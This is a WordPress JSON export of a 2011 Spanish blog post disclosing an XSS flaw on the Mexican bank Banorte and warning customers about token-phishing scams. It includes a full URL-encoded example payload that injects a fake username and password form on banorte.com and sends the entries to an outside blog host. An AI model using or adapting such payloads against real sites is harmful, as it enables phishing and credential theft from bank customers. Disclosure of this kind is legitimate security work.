{"id":967,"date":"2011-03-17T12:22:35","date_gmt":"2011-03-17T18:22:35","guid":{"rendered":"http:\/\/puchunguis.com\/blog\/?p=967"},"modified":"2011-03-22T21:30:29","modified_gmt":"2011-03-23T03:30:29","slug":"falla-de-seguridad-en-banorte-xss-el-banco-fuerte-de-mexico","status":"publish","type":"post","link":"https:\/\/www.jorgealdana.pro\/blog\/seguridad\/falla-de-seguridad-en-banorte-xss-el-banco-fuerte-de-mexico\/","title":{"rendered":"Falla de seguridad en Banorte (XSS), \u00abel banco fuerte de M\u00e9xico\u00bb"},"content":{"rendered":"<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/03\/banorte-logo.jpg\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" class=\"alignleft size-full wp-image-968\" title=\"banorte-logo\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/03\/banorte-logo.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a>Gol14th un Hacker conocido ha detectado una vulnerabilidad <strong>XSS en Banorte<\/strong> que sigue activa hasta hoy, esto puede desencadenar varios<strong> intentos de fraude por Internet<\/strong> en el cual por ejemplo aparece una pantalla que le solicita al cliente ingresar el n\u00famero de serie de su token, as\u00ed como los n\u00fameros que este muestra, con la excusa de que el banco requiere sincronizar el dispositivo (Ataque pishing).<\/p>\n<p>\u00a1Banorte <strong>nunca solicita a sus clientes informaci\u00f3n confidencial<\/strong> como esta!<\/p>\n<p>Por tu seguridad, ignora cualquiera de estas peticiones y no proporciones datos confidenciales como son tus claves de acceso, datos de tu token, o informaci\u00f3n personal.<\/p>\n<p>Siguiendo estas sencillas recomendaciones, todas tus transacciones por la banca por Internet seguir\u00e1n siendo siempre seguras.<\/p>\n<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/03\/exploit_banorte.jpg\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/03\/exploit_banorte-150x150.jpg\" alt=\"\" title=\"exploit_banorte\" width=\"150\" height=\"150\" class=\"alignnone size-thumbnail wp-image-971\" \/><\/a><\/p>\n<p>Ejemplo de un ataque:<\/p>\n<p><a href=\"http:\/\/www.banorte.com\/portal\/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Edocument.write%28%27%3Cp%3EPuchungo%20was%20here%20mtfk%20visita%20blog.puchunguis.com%3A%3C%2Fp%3E%3Cform+method%3D%22GET%22+action%3D%22http%3A%2F%2Fblog.puchunguis.com%22%3E%3Cp%3EUsuario+%3A+%3Cinput+type%3D%22text%22+name%3D%22val1%22+%2F%3E%3C%2Fp%3E%3Cp%3EPassword+%3A+%3Cinput+type%3D%22text%22+name%3D%22val2%22+%2F%3E%3C%2Fp%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E%27%29%3B%3C%2Fscript%3E%3Cscript%3E\" target=\"_blank\" rel=\"noopener\">http:\/\/www.banorte.com\/portal\/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Edocument.write%28%27%3Cp%3EPuchungo%20was%20here%20mtfk%20visita%20blog.puchunguis.com%3A%3C%2Fp%3E%3Cform+method%3D%22GET%22+action%3D%22http%3A%2F%2Fblog.puchunguis.com%22%3E%3Cp%3EUsuario+%3A+%3Cinput+type%3D%22text%22+name%3D%22val1%22+%2F%3E%3C%2Fp%3E%3Cp%3EPassword+%3A+%3Cinput+type%3D%22text%22+name%3D%22val2%22+%2F%3E%3C%2Fp%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E%27%29%3B%3C%2Fscript%3E%3Cscript%3E<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gol14th un Hacker conocido ha detectado una vulnerabilidad XSS en Banorte que sigue activa hasta hoy, esto puede desencadenar varios intentos de fraude por Internet en el cual por ejemplo aparece una pantalla que le solicita al cliente ingresar el n\u00famero de serie de su token, as\u00ed como los n\u00fameros que este muestra, con la excusa de que el banco requiere sincronizar el dispositivo (Ataque pishing). \u00a1Banorte nunca solicita a sus clientes informaci\u00f3n confidencial como esta! Por tu seguridad, ignora cualquiera de estas peticiones y no proporciones datos confidenciales como son tus claves de acceso, datos de tu token, o <\/p>\n","protected":false},"author":1,"featured_media":968,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[1818,1836,1835,1822,1823,1825,1817,1824,16,7,1819,1820,1837,1821],"class_list":["post-967","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","tag-banorte-hackeado","tag-banorte-mexico-hackeado","tag-banorte-por-internet-hackeado","tag-banorte-xss","tag-banorte-com-hackeado","tag-banorte-com-mx-hackeado","tag-hackean-a-banorte","tag-hackean-a-banorte-com","tag-hacker","tag-hackers","tag-hackers-banorte","tag-seguridad-en-banorte","tag-www-banorte-com-mx-hackeado","tag-xss-banorte","has_thumb"],"_links":{"self":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/967","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/comments?post=967"}],"version-history":[{"count":5,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/967\/revisions"}],"predecessor-version":[{"id":991,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/967\/revisions\/991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media\/968"}],"wp:attachment":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media?parent=967"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/categories?post=967"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/tags?post=967"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}